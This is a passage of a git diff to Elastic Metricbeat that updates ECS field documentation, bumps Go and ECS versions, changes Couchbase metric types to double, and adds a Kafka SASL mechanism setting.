b/metricbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt update \ diff --git a/metricbeat/cmd/root.go b/metricbeat/cmd/root.go index 8da887270bb..e7211f223cd 100644 --- a/metricbeat/cmd/root.go +++ b/metricbeat/cmd/root.go @@ -43,7 +43,7 @@ const ( Name = "metricbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // RootCmd to handle beats cli diff --git a/metricbeat/docs/fields.asciidoc b/metricbeat/docs/fields.asciidoc index 0281909a8b6..4f9932918f8 100644 --- a/metricbeat/docs/fields.asciidoc +++ b/metricbeat/docs/fields.asciidoc @@ -5740,6 +5740,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-beat]] == Beat fields @@ -8164,7 +8173,7 @@ type: long Number of get hits. -type: long +type: double -- @@ -8236,7 +8245,7 @@ type: long Number of operations performed on Couchbase. -type: long +type: double -- @@ -10167,6 +10176,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -10224,6 +10244,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -10246,6 +10278,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -10259,9 +10302,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -10576,6 +10622,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -10593,6 +10651,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -10616,6 +10686,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -10782,6 +10864,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -10839,6 +10932,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -10861,6 +10966,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -10874,9 +10990,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -11095,6 +11214,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -11118,6 +11249,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -11178,6 +11321,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -11923,6 +12075,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -11946,6 +12110,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -12094,6 +12270,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -12584,6 +12769,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -12641,6 +12837,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -12663,6 +12871,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -12700,8 +12919,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -12740,6 +12960,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -12758,6 +12987,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -12781,6 +13039,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -12838,6 +13107,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -12860,6 +13141,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -12893,10 +13185,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -12909,6 +13204,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -13186,6 +13517,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -13719,7 +14062,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -13783,7 +14126,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -13802,6 +14145,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -13859,6 +14213,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -13881,6 +14247,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -13893,7 +14270,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -13957,7 +14334,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -13977,10 +14354,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -14550,6 +14930,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -14573,6 +14965,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -14695,6 +15099,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -14749,6 +15162,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -14772,6 +15197,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -14894,6 +15331,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -15632,6 +16078,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -15689,6 +16146,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -15711,6 +16180,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -15724,9 +16204,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -16094,6 +16577,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -16151,6 +16645,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -16173,6 +16679,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -16186,9 +16703,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/metricbeat/docs/modules/kafka.asciidoc b/metricbeat/docs/modules/kafka.asciidoc index 44fb4b55313..17d7ee314d0 100644 --- a/metricbeat/docs/modules/kafka.asciidoc +++ b/metricbeat/docs/modules/kafka.asciidoc @@ -85,6 +85,10 @@ metricbeat.modules: #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: diff --git a/metricbeat/docs/modules/postgresql.asciidoc b/metricbeat/docs/modules/postgresql.asciidoc index ef475199d6a..995e6854f68 100644 --- a/metricbeat/docs/modules/postgresql.asciidoc +++ b/metricbeat/docs/modules/postgresql.asciidoc @@ -86,6 +86,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/helper/prometheus/prometheus.go b/metricbeat/helper/prometheus/prometheus.go index 0add9edd9bb..3568310466e 100644 --- a/metricbeat/helper/prometheus/prometheus.go +++ b/metricbeat/helper/prometheus/prometheus.go @@ -35,7 +35,7 @@ import ( "github.com/elastic/beats/v7/metricbeat/mb" ) -const acceptHeader = `application/openmetrics-text; version=0.0.1,text/plain;version=0.0.4;q=0.5,*/*;q=0.1` +const acceptHeader = `text/plain;version=0.0.4;q=0.5,*/*;q=0.1` // Prometheus helper retrieves prometheus formatted metrics type Prometheus interface { diff --git a/metricbeat/metricbeat.reference.yml b/metricbeat/metricbeat.reference.yml index 685dac86452..93d75700a69 100644 --- a/metricbeat/metricbeat.reference.yml +++ b/metricbeat/metricbeat.reference.yml @@ -436,6 +436,10 @@ metricbeat.modules: #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: @@ -734,6 +738,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/module/consul/_meta/Dockerfile b/metricbeat/module/consul/_meta/Dockerfile index 640e783c9a6..2846d457c3a 100644 --- a/metricbeat/module/consul/_meta/Dockerfile +++ b/metricbeat/module/consul/_meta/Dockerfile @@ -5,6 +5,5 @@ ENV CONSUL_BIND_INTERFACE='eth0' EXPOSE 8500 -# Use the same healthcheck as the Windows version of the image. -# https://github.com/Microsoft/mssql-docker/blob/a3020afeec9be1eb2d67645ac739438eb8f2c545/windows/mssql-server-windows/dockerfile#L31 -HEALTHCHECK --interval=1s --retries=90 CMD curl http://0.0.0.0:8500/v1/agent/metrics +# Wait till the service reports runtime metrics +HEALTHCHECK --interval=1s --retries=90 CMD curl -s http://0.0.0.0:8500/v1/agent/metrics | grep -q consul.runtime diff --git a/metricbeat/module/consul/docker-compose.yml b/metricbeat/module/consul/docker-compose.yml index 5131b14aa32..998c089b2b7 100644 --- a/metricbeat/module/consul/docker-compose.yml +++ b/metricbeat/module/consul/docker-compose.yml @@ -2,7 +2,7 @@ version: '2.3' services: consul: - image: docker.elastic.co/integrations-ci/beats-consul:${CONSUL_VERSION:-1.9.3}-1 + image: docker.elastic.co/integrations-ci/beats-consul:${CONSUL_VERSION:-1.9.3}-2 build: context: ./_meta args: diff --git a/metricbeat/module/couchbase/fields.go b/metricbeat/module/couchbase/fields.go index e283a53e038..85d8cb7ae02 100644 --- a/metricbeat/module/couchbase/fields.go +++ b/metricbeat/module/couchbase/fields.go @@ -32,5 +32,5 @@ func init() { // AssetCouchbase returns asset data. // This is the base64 encoded gzipped contents of module/couchbase. func AssetCouchbase() string { - return "eJzMmVFv4zYMgN/zK4gAA3rAznvPw4DihuH2kOFw656GwUdLTKzVtjxJTpr79QMlO3FcO3FSN5kf+hC75EeRIinqIzzTbgFCVyJN0NIMwCmX0QLmn5rf5jMASVYYVTqliwX8PAMAWJIzSlgQOstIOJKwMjqH/b+BJbMhY6MZgE21cbHQxUqtF7DCzGsylBFaWsAa+RtyThVru4C/5tZm8x9hnjpXzv+eAawUZdIuvN6PUGBOx8z8uF3JooyuyvqXHmh+vu3/8xsIXThUhQWXEuS1RS5FB1syBFYYLF9ZFtWi2lRtsqQSz+T2P/ehncDj57CIQVaDFrW+Ol695ukytbn479GLhuyZdlttZOfdCT5+fsecQK/8ygXKqFcrq5hO69OuHKVVosOosiSjZOfIduSstMnRLaDvXYDLdLG+jOwP9d2TVZaMVw9b5VJV1Ji2obYlCbVSJME6dBSiDQ2BIaskFQ5UAV8flwN2KfscrciJdABc6irJugt+zpVVnpBhQBYPtfgTADdd2MdcV4Xb07FuePAKPvQj5pRrs7sXZNAeMJNdK1BPQ/9baYeRwfwOyF8fl1fyVpaiUrgB2pKMoKL7NvBagRnJeJVp7H5whvtLkIprOmJ/WGkDKJzaEOjkHxLOfgBcc3Z33qpQfirDdgYDLW/Zhx8GLNSljUsysSXxDjtNl2SQP7O8TGBJ6EL2gyhHeSzYWRN5/kDBoi2gtVoo5BrOOas3ue7LblZZR2aa6lYLm6a8pVJGK0N0sw30qyGCFI0EaTjqbImCOHv7aKtNO7mJGDlsJKcdZjcj/3yA9urBq2dVl7HflvrJQ75acNygyjDJCJy+DN9XiA1m1e1i5nOXvp13LwNPdrHvcv4X6L7huST0c3yJQ46ZNLUt8aXJ7l5sc6w4VcRUIeklrruGPJks2S9DJxB2WM2x32O/sVJ/RlKC4GHJa3Wy1N6Yb+/EU2TcrrTz1233Epf+q9NXF50rfaHlPeiPUkBlDJ8BGOWi/XSw5w5ZbcCWK7hv7wbMr3PDoDX3KIrsgKM6OHrt7xQtV8XJXcpel3ZUpduPXLSkaVplH4mT9Mkil/Ga+gvu2840a1918xwLaftVszmR1MJGfJaP+QB2rznCcQ/jFxqY7HQYti1Ah7e14BcOPVvPmVrE3fMbhmgZYYgt0SnMztjy1pFYOI6HncNFutYKG0XbUeu9xzwZNO8SGBez+g/vQRoC4lLOmzp+PGJZxZVTmfruZySxQdc3aHrrKOkpJfj05U9oqQJWNTwUqhuD2A9OQt2cfCjTNB9BxwgM33FM2k8UIyZEvk3rpaMyTtZxGCN35/tvX572jBpKMpxpSYJVhaAwYfcXT7BFC9ahcTQwV1uTi1Plpgr64zrIggcO8Nq6aa9iOIwbqc01w7B3ciGbwy5mmRbs1fvMyQVygDQT8z3MmcHBAd+Qd3U//TsQNvpGXT8MjiInu2JgDftD7/mKX3MNH0/eljIaL3ancaPBBu9rrp4Fvb6JOQ+jy+nzwfGsv85Xunh9o3yMYrdYvpu7WHjoJUfuO08zuY8OQR2ADh3NSZiqdCqnaOhq5opFUTmBrIwq1rBNlTiUOF9HVHFwIjxYEgNcmyQ2VGZKYMwlOtTnyePJS/1JalHlVDjbvkL2um00+y8AAP//ab0SFw==" + return "eJzMmUGv2zYMgO/5FUSAAa/A6t1zGFB0GLpDhqLrTsPg0hITa8+2PElOXvrrB0p24vjZiZPnJPPhHWI/8qNIkRT1Hp5ptwChK5EmaGkG4JTLaAHzj81v8xmAJCuMKp3SxQJ+ngEALMkZJSwInWUkHElYGZ3D/t/AktmQsdEMwKbauFjoYqXWC1hh5jUZyggtLWCN/A05p4q1XcBfc2uz+Y8wT50r53/PAFaKMmkXXu97KDCnY2Z+3K5kUUZXZf1LDzQ/3/b/+Q2ELhyqwoJLCfLaIpeigy0ZAisMlq8si2pRbao2WVKJZ3L7n/vQTuDxc1jEIKtBi1pfHa9e83SZ2lz89+hFQ/ZMu602svPuBB8/v2NOoFd+5QJl1KuVVUyn9euuHKVVosOosiSjZOfIduSstMnRLaDvXYDLdLG+jOwP9d2TVZaMVw9b5VJV1Ji2obYlCbVSJME6dBSiDQ2BIaskFQ5UAV8+LAfsUvY5WpET6QC41FWSdRf8nCurPCHDgCweavEnAO66sB9yXRVuT8e64ckreNePmFOuze5RkEF7wEx2rUA9Df1vpR1GBvMHIH/5sLySt7IUlcIN0JZkBBXdt4HXCsxIxqtMY/eDM9yfg1Rc0xH700obQOHUhkAn/5Bw9h3gmrO781aF8lMZtjMYaHnLPv0wYKEubVySiS2JG+w0XZJB/szyMoEloQvZD6Ic5bFgZ03k+QMFi7aA1mqhkGs456ze5Lovu1llHZlpqlstbJrylkoZrQzR3TbQr4YIUjQSpOGosyUK4uzto6027eQmYuSwkZx2mN2N/NMB2qsHr55VXcZ+X+qvHvLVguMGVYZJRuD0Zfi+Qmwwq+4XM5+69O28exl4sot9l/O/QPcNzyWhn+NLHHLMpKltiS9Ndvdim2PFqSKmCkkvcd015MlkyX4ZOoGww2qO/R77jZX6M5ISBE9LXquTpfbOfHsnniLjdqWdv+67l7j0X52+uuhc6QstH0F/lAIqY/gMwCgX7aeDPQ/IagO2XMF9fzdgfp0bBq15RFFkBxzVwdFr/6BouSpOHlL2urSjKt1+5KIlTdMq+0icpE8WuYzX1F9w33amWfuqm+dYSNuvms2JpBY24rN8zAewR80RjnsYv9DAZKfDsG0BOryvBb9w6Nl6ztQi7p7fMETLCENsiU5hdsaWt47EwnE87Bwu0rVW2CjajlrvPebJoLlJYFzM6j98BGkIiEs57+r48YhlFVdOZeq7n5HEBl3foOmto6SvKcHHz39CSxWwquGhUN0YxH5wEurm5EOZpvkIOkZg+I5j0n6iGDEh8m1aLx2VcbKOwxi5O99/+/K0Z9RQkuFMSxKsKgSFCbu/eIItWrAOjaOBudqaXJwqd4s5OldCFj1whNfWTXsZw4HcSG0uGob9kwvZHHcxy7Rgvz5mUi6QQ6SZme9hzowODviGvLP76W9A2OgbdQExOIyc7JKBNeyPvedrfs01fEB5W9JovNidx40GG7yxuXoa9Pou5jyMLm+REY7n/XXO0sXrW+VjGLvF8mYOY+Ghnxy58zzN5F46hHUAOnQ1J2Gq0qmcoqHrmSsWReUEsjKqWMM2VeJQ5nwtUcXBifBkSQxwbZLYUJkpgTGX6VCjJ6+CXupPUosqp8LZ9jWy122j2X8BAAD//ytkE60=" } diff --git a/metricbeat/module/couchbase/node/_meta/data.json b/metricbeat/module/couchbase/node/_meta/data.json index 7b3c48537a4..bd533a03867 100644 --- a/metricbeat/module/couchbase/node/_meta/data.json +++ b/metricbeat/module/couchbase/node/_meta/data.json @@ -37,7 +37,7 @@ "value": 7303 }, "ep_bg_fetched": 0, - "get_hits": 0, + "get_hits": 1.1, "hostname": "172.17.0.2:8091", "mcd_memory": { "allocated": { @@ -58,7 +58,7 @@ "bytes": 53962016 } }, - "ops": 0, + "ops": 1.1, "swap": { "total": { "bytes": 4189057024 diff --git a/metricbeat/module/couchbase/node/_meta/fields.yml b/metricbeat/module/couchbase/node/_meta/fields.yml index 95f6613e4cc..bb36fc9c68f 100644 --- a/metricbeat/module/couchbase/node/_meta/fields.yml +++ b/metricbeat/module/couchbase/node/_meta/fields.yml @@ -51,7 +51,7 @@ description: > Number of disk fetches performed since the server was started. - name: get_hits - type: long + type: double description: > Number of get hits. - name: hostname @@ -80,7 +80,7 @@ description: > Memory used by the node (bytes). - name: ops - type: long + type: double description: > Number of operations performed on Couchbase. - name: swap.total.bytes diff --git a/metricbeat/module/couchbase/node/_meta/testdata/docs.json b/metricbeat/module/couchbase/node/_meta/testdata/docs.json index 73519a9b201..4ba618e5545 100644 --- a/metricbeat/module/couchbase/node/_meta/testdata/docs.json +++ b/metricbeat/module/couchbase/node/_meta/testdata/docs.json @@ -43,9 +43,9 @@ "curr_items": 7303, "curr_items_tot": 7303, "ep_bg_fetched": 0, - "get_hits": 0, + "get_hits": 1.1, "mem_used": 53962016, - "ops": 0, + "ops": 1.1, "vb_replica_curr_items": 0 }, "uptime": "7260", diff --git a/metricbeat/module/couchbase/node/_meta/testdata/docs.json-expected.json b/metricbeat/module/couchbase/node/_meta/testdata/docs.json-expected.json index de61c765031..16f5024c0a4 100644 --- a/metricbeat/module/couchbase/node/_meta/testdata/docs.json-expected.json +++ b/metricbeat/module/couchbase/node/_meta/testdata/docs.json-expected.json @@ -37,7 +37,7 @@ "value": 7303 }, "ep_bg_fetched": 0, - "get_hits": 0, + "get_hits": 1.1, "hostname": "172.17.0.2:8091", "mcd_memory": { "allocated": { @@ -58,7 +58,7 @@ "bytes": 53962016 } }, - "ops": 0, + "ops": 1.1, "swap": { "total": { "bytes": 4189057024 diff --git a/metricbeat/module/couchbase/node/data.go b/metricbeat/module/couchbase/node/data.go index e1f797ed1bb..901729737f9 100644 --- a/metricbeat/module/couchbase/node/data.go +++ b/metricbeat/module/couchbase/node/data.go @@ -45,9 +45,9 @@ type NodeInterestingStats struct { CurrItems int64 `json:"curr_items"` CurrItemsTot int64 `json:"curr_items_tot"` EpBgFetched int64 `json:"ep_bg_fetched"` - GetHits int64 `json:"get_hits"` + GetHits float64 `json:"get_hits"` MemUsed int64 `json:"mem_used"` - Ops int64 `json:"ops"` + Ops float64 `json:"ops"` VbReplicaCurrItems int64 `json:"vb_replica_curr_items"` } diff --git a/metricbeat/module/http/_meta/Dockerfile b/metricbeat/module/http/_meta/Dockerfile index 07d81b3c5b9..fdda93f7765 100644 --- a/metricbeat/module/http/_meta/Dockerfile +++ b/metricbeat/module/http/_meta/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 COPY test/main.go main.go diff --git a/metricbeat/module/kafka/_meta/config.yml b/metricbeat/module/kafka/_meta/config.yml index ac3fb92b72d..d20a957cc9f 100644 --- a/metricbeat/module/kafka/_meta/config.yml +++ b/metricbeat/module/kafka/_meta/config.yml @@ -30,6 +30,10 @@ #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: diff --git a/metricbeat/module/kafka/broker.go b/metricbeat/module/kafka/broker.go index 2e558d7944a..11bc0ac2c5c 100644 --- a/metricbeat/module/kafka/broker.go +++ b/metricbeat/module/kafka/broker.go @@ -60,6 +60,7 @@ type BrokerSettings struct { TLS *tls.Config Username, Password string Version kafka.Version + Sasl kafka.SaslConfig } type GroupDescription struct { @@ -91,6 +92,7 @@ func NewBroker(host string, settings BrokerSettings) *Broker { cfg.Net.SASL.Enable = true cfg.Net.SASL.User = user 